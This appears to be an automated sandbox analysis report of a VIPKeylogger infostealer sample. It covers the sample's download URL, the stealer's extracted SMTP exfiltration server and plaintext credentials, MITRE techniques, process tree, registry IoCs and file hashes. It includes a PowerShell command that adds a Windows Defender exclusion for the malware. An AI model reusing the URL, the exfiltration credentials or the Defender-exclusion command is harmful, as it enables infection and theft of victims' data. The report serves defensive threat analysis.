vipkeylogger | hxxp://87[.]120[.]84[.]38/txt/f2rPs6mHkljoAcH[.]exe

Analysis

max time kernel
145s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/10/2024, 09:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://87.120.84.38/txt/f2rPs6mHkljoAcH.exe

Score

10^/10

vipkeylogger collection discovery execution keylogger spyware stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
185.198.59.26
Port:
587
Username:
[email protected]
Password:
7213575aceACE@@
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1732	powershell.exe
1636	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	f2rPs6mHkljoAcH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	f2rPs6mHkljoAcH.exe

Executes dropped EXE 4 IoCs

pid	Process
4120	f2rPs6mHkljoAcH.exe
3940	f2rPs6mHkljoAcH.exe
3484	f2rPs6mHkljoAcH.exe
3376	f2rPs6mHkljoAcH.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
75	checkip.dyndns.org

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4120 set thread context of 3484	4120	f2rPs6mHkljoAcH.exe	134
PID 3940 set thread context of 3376	3940	f2rPs6mHkljoAcH.exe	136

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2rPs6mHkljoAcH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2rPs6mHkljoAcH.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 847267.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
3524	msedge.exe
3524	msedge.exe
532	msedge.exe
532	msedge.exe
4784	identity_helper.exe
4784	identity_helper.exe
1984	msedge.exe
1984	msedge.exe
3940	f2rPs6mHkljoAcH.exe
4120	f2rPs6mHkljoAcH.exe
3940	f2rPs6mHkljoAcH.exe
4120	f2rPs6mHkljoAcH.exe
3940	f2rPs6mHkljoAcH.exe
4120	f2rPs6mHkljoAcH.exe
3940	f2rPs6mHkljoAcH.exe
4120	f2rPs6mHkljoAcH.exe
3484	f2rPs6mHkljoAcH.exe
3484	f2rPs6mHkljoAcH.exe
3376	f2rPs6mHkljoAcH.exe
3376	f2rPs6mHkljoAcH.exe
1636	powershell.exe
1636	powershell.exe
1732	powershell.exe
1732	powershell.exe
1732	powershell.exe
1636	powershell.exe
3376	f2rPs6mHkljoAcH.exe
3484	f2rPs6mHkljoAcH.exe
4120	msedge.exe
4120	msedge.exe
4120	msedge.exe
4120	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4120	f2rPs6mHkljoAcH.exe
Token: SeDebugPrivilege	3940	f2rPs6mHkljoAcH.exe
Token: SeDebugPrivilege	3484	f2rPs6mHkljoAcH.exe
Token: SeDebugPrivilege	3376	f2rPs6mHkljoAcH.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe
532	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 532 wrote to memory of 3224	532	msedge.exe	84
PID 532 wrote to memory of 3224	532	msedge.exe	84
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3020	532	msedge.exe	85
PID 532 wrote to memory of 3524	532	msedge.exe	86
PID 532 wrote to memory of 3524	532	msedge.exe	86
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87
PID 532 wrote to memory of 4856	532	msedge.exe	87

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f2rPs6mHkljoAcH.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://87.120.84.38/txt/f2rPs6mHkljoAcH.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdce0346f8,0x7ffdce034708,0x7ffdce034718
  2⤵
  PID:3224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
  2⤵
  PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:2280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:964
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
  2⤵
  PID:1088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5544 /prefetch:8
  2⤵
  PID:756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:4208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:3672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3392 /prefetch:8
  2⤵
  PID:4076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1856 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1984
- C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe
  "C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- - C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe
    "C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:3484
- C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe
  "C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1732
- - C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe
    "C:\Users\Admin\Downloads\f2rPs6mHkljoAcH.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16187786224597040278,4517284749486935744,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5648 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4120

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:860

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f2rPs6mHkljoAcH.exe.log

Filesize
1KB

MD5
8ec831f3e3a3f77e4a7b9cd32b48384c

SHA1
d83f09fd87c5bd86e045873c231c14836e76a05c

SHA256
7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

SHA512
26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6960857d16aadfa79d36df8ebbf0e423

SHA1
e1db43bd478274366621a8c6497e270d46c6ed4f

SHA256
f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

SHA512
6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f426165d1e5f7df1b7a3758c306cd4ae

SHA1
59ef728fbbb5c4197600f61daec48556fec651c1

SHA256
b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

SHA512
8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
852f378d85159e3bacb397cb2bb592a5

SHA1
75dd461550f9fd56c16aaf987fc2404dfc76011f

SHA256
f6c1e85c14b18ac731203ce028932d384721ccc22e01563b0f224e98e77d3597

SHA512
dbff63af53904c44e6df3b2280af8634d29f0193111269b7c59cddcfa3ede61a463b4e69c981ccf3c0ca40623fc30de462af5a8ff9ed16cd3315d91c20329bdc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
3a9c9c2a2a2e6e5294467d86364e9770

SHA1
ace83bd6a87b69eb3b204afaf17103ac4d5c5b96

SHA256
1de05f72803e2322c8c0ca271c35bb5681b8ad5c684ed2c1c6f5bbbf0692bc9e

SHA512
51f535dda5eaa79840a277cee851aeabbd0dcf371e2075afe2979f916654921b95f51f21f2f2adf96da68eba7d877b4bd8920073128fd3a9244a8b346f43d3b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
58c380bf94880122c39acc44676ecc5b

SHA1
ec4abcba1b6609ce2d1fcb9fe92ae2f9974ba645

SHA256
317c595469d002ecfc710e13d6f7173a3666b12321361877eab3e2d1815b9f8b

SHA512
de93b756cc0c4954301235c201f45e9540b1dbb51212b405fa20573d90d0a177640f773a5a5162ad30308b579d0ed97bc89ca60ba17b5627ff2307ef78ac9adc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b86887dec2b2feeb763922ce51b98044

SHA1
7035b4faeb611df7cf2c477764cbb53ad0440db7

SHA256
2ed3187556366f736a59d9e93dbdad12f8ce5291e4b1760c9c6bc39d9a836456

SHA512
68d2af59f923578d1161d24c354b6678f9bb287c1e2778b61e2f35af1e6c407558cf080da48ceff242b715742ecc183318957fb36118b75e27af7ff40e2196a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
5bee7bdc3bb5edbafddcc08e4671fdfa

SHA1
1d5cabfdc2607b11776b1361f9fd55289bc4f160

SHA256
d23223c3d475d7fa673558f88430a5142d8500e1885a60cb94fac6b2de3c8529

SHA512
